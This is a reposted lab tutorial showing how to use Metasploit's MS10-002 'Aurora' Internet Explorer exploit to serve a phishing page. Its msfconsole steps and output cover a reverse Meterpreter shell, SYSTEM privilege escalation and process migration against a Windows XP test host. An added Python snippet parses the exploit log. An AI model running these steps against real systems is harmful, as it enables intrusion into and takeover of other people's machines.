ms10_002 (Aurora vulnerability) penetration test steps: setting up a phishing site with MSF

1. The MS10_002 Aurora vulnerability

This article briefly describes how to use Metasploit to run a penetration test against ms10_002 (the Aurora vulnerability); it is for study purposes only.

Test environment   Description      IP
Attacker host      Kali 2020        192.168.1.113
Target host        Windows XP SP3   192.168.1.106

① Start msf, search for ms10_002, select the exploit module in msf, and set its parameters

msf6 > search ms10_002

Matching Modules
================

   #  Name                                        Disclosure Date  Rank    Check  Description
   -  ----                                        ---------------  ----    -----  -----------
   0  exploit/windows/browser/ms10_002_aurora     2010-01-14       normal  No     MS10-002 Microsoft Internet Explorer "Aurora" Memory Corruption
   1  exploit/windows/browser/ms10_002_ie_object  2010-01-21       normal  No     MS10-002 Microsoft Internet Explorer Object Memory Use-After-Free


Interact with a module by name or index. For example info 1, use 1 or use exploit/windows/browser/ms10_002_ie_object

msf6 > use 0
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp

msf6 exploit(windows/browser/ms10_002_aurora) > options

Module options (exploit/windows/browser/ms10_002_aurora):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address o
                                       n the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Negotiate SSL for incoming connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.1.113    yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic

msf6 exploit(windows/browser/ms10_002_aurora) > set srvport 80
srvport => 80
msf6 exploit(windows/browser/ms10_002_aurora) > set lport 443
lport => 443
msf6 exploit(windows/browser/ms10_002_aurora) > set uripath /
uripath => /

msf6 exploit(windows/browser/ms10_002_aurora) > exploit
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 192.168.1.113:443 
[*] Using URL: http://0.0.0.0:80/
[*] Local IP: http://192.168.1.113:80/
msf6 exploit(windows/browser/ms10_002_aurora) > [*] Server started.

② The output shows that the phishing site is now listening on port 80 of the local host; open the browser on the target machine and enter 192.168.1.106

③ The attacker host compromises the target successfully and obtains a meterpreter session

msf6 exploit(windows/browser/ms10_002_aurora) > [*] Server started.
[*] 192.168.1.109    ms10_002_aurora - Sending MS10-002 Microsoft Internet Explorer "Aurora" Memory Corruption
[*] 192.168.1.109    ms10_002_aurora - Sending MS10-002 Microsoft Internet Explorer "Aurora" Memory Corruption
[*] 192.168.1.109    ms10_002_aurora - Sending MS10-002 Microsoft Internet Explorer "Aurora" Memory Corruption
[*] 192.168.1.109    ms10_002_aurora - Sending MS10-002 Microsoft Internet Explorer "Aurora" Memory Corruption
[*] 192.168.1.106    ms10_002_aurora - Sending MS10-002 Microsoft Internet Explorer "Aurora" Memory Corruption
[*] Sending stage (175174 bytes) to 192.168.1.106
[*] Meterpreter session 1 opened (192.168.1.113:443 -> 192.168.1.106:4278) at 2021-06-07 13:25:17 +0800

msf6 exploit(windows/browser/ms10_002_aurora) > sessions

Active sessions
===============

  Id  Name  Type                     Information             Connection
  --  ----  ----                     -----------             ----------
  1         meterpreter x86/windows  WINXP-1\st21 @ WINXP-1  192.168.1.113:443 -> 192.168.1.106:4278 (192.168.1.10
                                                             6)

msf6 exploit(windows/browser/ms10_002_ie_object) > sessions 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: WINXP-1\st21
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > 
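The msfconsole output above records both which hosts requested the exploit page (the `Sending MS10-002 ...` lines) and which one actually returned a stage and a session. As an added example that is not part of the original post, this Python snippet parses constructed log lines in the same format and separates hosts that merely loaded the page from hosts that produced a session, which is useful when reviewing an engagement log:

```python
import re
from collections import defaultdict

# Constructed sample, modelled on the msfconsole output shown above.
SAMPLE_LOG = """\
[*] Started reverse TCP handler on 192.168.1.113:443
[*] Using URL: http://0.0.0.0:80/
[*] 192.168.1.109    ms10_002_aurora - Sending MS10-002 Microsoft Internet Explorer "Aurora" Memory Corruption
[*] 192.168.1.109    ms10_002_aurora - Sending MS10-002 Microsoft Internet Explorer "Aurora" Memory Corruption
[*] 192.168.1.106    ms10_002_aurora - Sending MS10-002 Microsoft Internet Explorer "Aurora" Memory Corruption
[*] Sending stage (175174 bytes) to 192.168.1.106
[*] Meterpreter session 1 opened (192.168.1.113:443 -> 192.168.1.106:4278) at 2021-06-07 13:25:17 +0800
"""

# One pattern per line type: exploit page served, stage delivered, session opened.
SENT_RE = re.compile(r"^\[\*\] (\d+\.\d+\.\d+\.\d+)\s+(\S+) - Sending ")
STAGE_RE = re.compile(r"^\[\*\] Sending stage \((\d+) bytes\) to (\d+\.\d+\.\d+\.\d+)")
SESSION_RE = re.compile(
    r"^\[\*\] Meterpreter session (\d+) opened \((\S+) -> (\d+\.\d+\.\d+\.\d+):(\d+)\) at (.+)$"
)


def summarize(log_text):
    """Return per-client-IP stats: pages served, stage bytes sent, session ids."""
    hosts = defaultdict(lambda: {"served": 0, "stage_bytes": 0, "sessions": []})
    for line in log_text.splitlines():
        m = SENT_RE.match(line)
        if m:
            hosts[m.group(1)]["served"] += 1
            continue
        m = STAGE_RE.match(line)
        if m:
            hosts[m.group(2)]["stage_bytes"] += int(m.group(1))
            continue
        m = SESSION_RE.match(line)
        if m:
            hosts[m.group(3)]["sessions"].append(int(m.group(1)))
    return dict(hosts)


def unsuccessful_hosts(summary):
    """Hosts that loaded the exploit page but never returned a stage or session."""
    return sorted(ip for ip, s in summary.items() if s["served"] and not s["sessions"])


if __name__ == "__main__":
    result = summarize(SAMPLE_LOG)
    for ip, stats in sorted(result.items()):
        print(ip, stats)
    print("served but no session:", unsuccessful_hosts(result))
```

In the sample, 192.168.1.109 is served the page twice without ever receiving a stage, while 192.168.1.106 receives the stage and opens session 1.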


2. Advanced options

Use advanced to view the advanced options

msf6 exploit(windows/browser/ms10_002_aurora) > advanced

Module advanced options (exploit/windows/browser/ms10_002_aurora):

   Name                    Current Setting  Required  Description
   ----                    ---------------  --------  -----------
   ContextInformationFile                   no        The information file that contains context information
   DisablePayloadHandler   false            no        Disable the handler code for the selected payload
   EnableContextEncoding   false            no        Use transient context when encoding payloads
   ListenerComm                             no        The specific communication channel to use for this service
   SSLCipher                                no        String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH"
   SSLCompression          false            no        Enable SSL/TLS-level compression
   SendRobots              false            no        Return a robots.txt file if asked for one
   URIHOST                                  no        Host to use in URI (useful for tunnels)
   URIPORT                                  no        Port to use in URI (useful for tunnels)
   VERBOSE                 false            no        Enable detailed status messages
   WORKSPACE                                no        Specify the workspace for this module


Payload advanced options (windows/meterpreter/reverse_tcp):

   Name                         Current Setting  Required  Description
   ----                         ---------------  --------  -----------
   AutoLoadStdapi               true             yes       Automatically load the Stdapi extension
   AutoRunScript                                 no        A script to run automatically on session creation.
   AutoSystemInfo               true             yes       Automatically capture system information on initialization.
   AutoUnhookProcess            false            yes       Automatically load the unhook extension and unhook the proces
                                                           s
   AutoVerifySessionTimeout     30               no        Timeout period to wait for session validation to occur, in se
                                                           conds
   EnableStageEncoding          false            no        Encode the second stage payload
   EnableUnicodeEncoding        false            yes       Automatically encode UTF-8 strings as hexadecimal
   HandlerSSLCert                                no        Path to a SSL certificate in unified PEM format, ignored for
                                                           HTTP transports
   InitialAutoRunScript                          no        An initial script to run on session creation (before AutoRunS
                                                           cript)
   PayloadBindPort                               no        Port to bind reverse tcp socket to on target system.
   PayloadProcessCommandLine                     no        The displayed command line that will be used by the payload
   PayloadUUIDName                               no        A human-friendly name to reference this unique payload (requi
                                                           res tracking)
   PayloadUUIDRaw                                no        A hex string representing the raw 8-byte PUID value for the U
                                                           UID
   PayloadUUIDSeed                               no        A string to use when generating the payload UUID (determinist
                                                           ic)
   PayloadUUIDTracking          false            yes       Whether or not to automatically register generated UUIDs
   PingbackRetries              0                yes       How many additional successful pingbacks
   PingbackSleep                30               yes       Time (in seconds) to sleep between pingbacks
   PrependMigrate               false            yes       Spawns and runs shellcode in new process
   PrependMigrateProc                            no        Process to spawn and run shellcode in
   ReverseAllowProxy            false            yes       Allow reverse tcp even with Proxies specified. Connect back w
                                                           ill NOT go through proxy but directly to LHOST
   ReverseListenerBindAddress                    no        The specific IP address to bind to on the local system
   ReverseListenerBindPort                       no        The port to bind to on the local system if different from LPO
                                                           RT
   ReverseListenerComm                           no        The specific communication channel to use for this listener
   ReverseListenerThreaded      false            yes       Handle every connection in a new thread (experimental)
   SessionCommunicationTimeout  300              no        The number of seconds of no activity before this session shou
                                                           ld be killed
   SessionExpirationTimeout     604800           no        The number of seconds before this session should be forcibly
                                                           shut down
   SessionRetryTotal            3600             no        Number of seconds try reconnecting for on network failure
   SessionRetryWait             10               no        Number of seconds to wait between reconnect attempts
   StageEncoder                                  no        Encoder to use if EnableStageEncoding is set
   StageEncoderSaveRegisters                     no        Additional registers to preserve in the staged payload if Ena
                                                           bleStageEncoding is set
   StageEncodingFallback        true             no        Fallback to no encoding if the selected StageEncoder is not c
                                                           ompatible
   StagerRetryCount             10               no        The number of times the stager should retry if the first conn
                                                           ect fails
   StagerRetryWait              5                no        Number of seconds to wait for the stager between reconnect at
                                                           tempts
   VERBOSE                      false            no        Enable detailed status messages
   WORKSPACE                                     no        Specify the workspace for this module

For example, to migrate quickly to another process once connected to the target computer, so that the session is not killed:

msf6 exploit(windows/browser/ms10_002_aurora) > set autorunscript migrate -f
autorunscript => migrate -f

Reposted from blog.csdn.net/qq_19623861/article/details/117658571